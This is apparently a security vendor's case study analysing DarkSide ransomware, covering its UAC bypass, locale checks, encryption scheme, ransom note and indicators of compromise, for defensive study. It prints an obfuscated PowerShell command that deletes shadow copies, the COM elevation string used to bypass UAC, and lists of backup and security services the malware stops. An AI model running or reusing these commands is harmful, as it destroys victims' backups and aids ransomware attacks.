Сase study

DarkSide Ransomware Does Not Attack Hospitals, Schools and Governments

DarkSide is a new ransomware attack that started at the beginning of August 2020. It is supposedly run by former affiliates of other ransomware campaigns that extorted money who decided to come up with their own code. According to the known incidents, the ransom demanded falls in the range of between $200,000 and $2,000,000 (US). 

AcronisCyber Cloud

Like other ransomware used in targeted attacks, DarkSide not only encrypts the user’s data but also exfiltrates data from the compromised servers. But unlike Maze ransomware, which successfully attacked the Newhall School District and Fairfax County Schools in California, DarkSide has a code of conduct that implies it will not attack hospitals, schools, and government organizations.

Summary


●    Discovered in August 2020
●    Targets only English-speaking countries, while avoiding former Soviet countries
●    Does not attack hospitals, hospices, schools, universities, non-profit organizations, or government agencies
●    Uses Salsa20 with the custom matrix and RSA-1024 encryption algorithms
●    Ransoms range from $200,000 to $2,000,000.

 

UAC bypassing via COM interface


To elevate privileges, DarkSide tries to bypass UAC by using the CMSTPLUA COM interface.
Some old COM interfaces can be elevated without UAC prompting, so this vulnerability is commonly used by malware to get Admin rights. Hopefully, it is patched on Windows 10 and UAC prompting is present here. The code is available on github: https://gist.github.com/api0cradle/d4aaef39db0d845627d819b2b6b30512
 

To bypass UAC, DarkSide calls the CoGetObject() function passing the following decrypted string as an argument:


Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
 

Locale check


Using GetSystemDefaultUILanguage() and GetUserDefaultLangID() functions, DarkSide checks the machine’s location to avoid systems located in the former Soviet countries from being encrypted. 

 

The whitelist contains languages from 17 countries:


●    Russian - 419
●    Ukranian - 422 
●    Belarusian - 423
●    Tajik - 428
●    Armenian - 42B
●    Azerbaijani (Latin) - 42C
●    Georgian - 437
●    Kazakh - 43F
●    Kyrgyz (Cyrillic) - 440
●    Turkmen - 442 
●    Uzbek (Latin) - 443
●    Tatar - 444
●    Romanian (Moldova) - 818 
●    Russian (Moldova) - 819
●    Azerbaijani (Cyrillic) - 82C
●    Uzbek (Cyrillic) - 843

●    Arabic (Syria) - 2801

Logging


Once started, DarkSide creates a log file called ‘LOG.{userid}.TXT’, where it writes the step-by-step ransomware’s execution process. 

The logged data looks as follows:

To be more stealthy, the ransomware empties the Recycle Bin without using the SHEmptyRecycleBinA() function. Instead, it removes files and folders thrown to the Recycle Bin one by one.

DarkSide uninstalls the following services related to security and backup solutions:
vss sql svc memtas mepocs sophos veeam backup 

After uninstalling the Volume Shadow Copy Service (VSS), DarkSide then deletes shadow copies by launching the obfuscated powershell script.

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

After deobfuscation, the PowerShell command looks as follows:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

The last step before encryption is to terminating processes to unlock files with the user’s data:
sql
oracle
ocssd
dbsnmp
synctime
agntsvc
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
encsvc
firefox
tbirdconfig
mydesktopqos
ocomm
dbeng50
sqbcoreservice 
excel
infopath
msaccess
mspub
onenote
outlook
powerpnt
steam
thebat
thunderbird
visio
winword
wordpad
notepad

 

But DarkSide does not touch system and TeamViewer processes:


vmcompute.exe
vmms.exe
vmwp.exe
svchost.exe
TeamViewer.exe

explorer.exe

The list contains the TeamViewer process, which is a remote desktop software. The reason why it is not terminated indicates the aim of accessing a victim’s computer later.

Encryption


Encryption starts with generating a user id, which is added to a filename. To construct the user id, DarkSide retrieves adapter information for the victim’s computer using GetAdapterInfo.
 

It computes CRC32 five times for six bytes of the adapters’ MAC address, where the initial value is 0xDEADBEEF.

Some XOR operations are performed. The first cycle is responsible for xoring with a step in eight bytes, second one in four and ends at the fourth byte.

Let us proceed to the encryption process itself. 

DarkSide`s encryption is implemented using I/O ports to speed up the encryption process. It first calls CreateIoCompletionPort with 0 simultaneous threads, but it creates eight threads by itself.
 

To add a file to an I/O port, it uses PostQueuedCompletionPort function. To retrieve an encrypted file, it uses the GetQueuedCompletionPort function.

DarkSide twice calls RtlRandomEx, where passed 0x00 value as seed parameter at the first time. 
 

Using a random generator, the ransomware creates two byte arrays with sizes that are 32 and 24 bytes. It establishes 64 bytes with eight zero bytes between the two generated byte arrays and makes up the matrix with 16 values by four bytes in each one.  

DarkSide encrypts files using the Salsa20 algorithm, but with a custom matrix generated above with RtlRandomEx.

The master public RSA-1024 key is embedded into the ransomware code and is 80 bytes in size. It is used to encrypt the Salsa matrix. 

After the file is encrypted, DarkSide adds the encrypted generated matrix to the file footer.

During encryption DarkSide skips the following folders, files, and file extensions:

The encrypted files appended with the unique user extension appear as follows:

Ransom note

DarkSide leaves the ransom note as ‘README.{userid}.TXT’ file with the following content:
 

 

The ransom note contains two sites:


●    http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68, which is the official DarkSide site
●    http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC, which is a personal leak page

DarkSide also specifies a Key that needs to be entered at the first site. The Key is not unique to each user, but rather seems to be unique per sample, as the value is hardcoded and encrypted in the executable.


Decryption service


The decryption service is located in the Tor network, according to the link in the ransom note


http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
It prompts the victim to enter the user key from the ransom note to pass the security challenge.

Wallets:


BTC - bc1qena2vfl7xhc5ad7q06eeuyd563ykxmwardnt2d 
XMR - 86R5YKD3DbMTJ1mgqiYjjsVULxwcxN5h5YyJt7Sz4B2oZEpZCnGBDZY4DG293xeeZSeF6iaDJqAoRVMeQXgUNM5x3fzyZru

There is only one company whose data has been published by the attackers. The amount of data exceeds 200GB data.

IoCs


MD5: f87a2e1c3d148a67eaeb696b1ab69133
SHA256: 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
LOG.{userid}.TXT
README.{userid}.TXT
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
darksidedxcftmqa.onion

Detection by Acronis


The antimalware technology integrated in Acronis Cyber Protect successfully blocks DarkSide and restores the encrypted files.